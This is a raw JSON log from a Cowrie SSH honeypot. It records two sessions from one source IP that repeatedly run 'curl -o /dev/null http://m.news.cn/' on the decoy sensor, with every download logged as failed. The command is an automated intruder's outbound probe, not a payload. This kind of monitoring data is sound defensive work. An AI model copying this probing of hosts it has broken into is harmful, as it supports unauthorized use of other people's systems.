{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.473951Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.476347Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.477181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.515261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.516385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.518559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.519860Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.552138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.553301Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.555427Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.557281Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.561342Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.562473Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.590882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.592080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.600442Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.601405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.631053Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.632207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.652845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.655867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.690944Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.692313Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.716651Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.717887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.734993Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.736300Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.749472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.750612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.767918Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.769023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.777224Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.793555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.794747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.819263Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.820555Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.827336Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.828479Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.841700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.842894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.860956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.862226Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.867826Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.868876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.876836Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.877823Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.899795Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.900977Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.905812Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.906965Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.911307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.912290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.944633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.945947Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.949600Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.950578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.952669Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.954365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.989837Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.994138Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.995405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.997591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.998806Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.011861Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.034616Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.052478Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.072443Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.094895Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.115271Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.119311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.120412Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.128975Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.130014Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.141085Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.158675Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.174441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.175873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.180539Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.181923Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.197616Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.198892Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.216134Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.217405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.219412Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.220207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.246132Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.248252Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.256153Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.257185Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.258846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.259667Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.286356Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.287554Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.291108Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.292081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.296022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.297131Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.328040Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.329072Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.335473Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.336458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.347771Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.349432Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.363032Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.364171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.380181Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.381521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.401153Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.402387Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.404000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.405127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.429132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.430350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.445040Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.453662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.455387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.483395Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.484937Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.500056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.501333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.507898Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.508982Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.527814Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.529669Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.541152Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.542311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.544696Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.546304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.576092Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
